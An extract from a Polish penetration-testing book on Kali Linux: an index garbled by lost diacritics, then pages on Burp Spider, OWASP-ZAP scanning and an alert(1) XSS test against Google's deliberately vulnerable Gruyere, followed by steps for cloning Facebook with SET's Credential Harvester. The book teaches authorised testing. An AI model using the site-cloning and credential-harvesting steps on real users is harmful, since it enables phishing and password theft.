kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 19: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

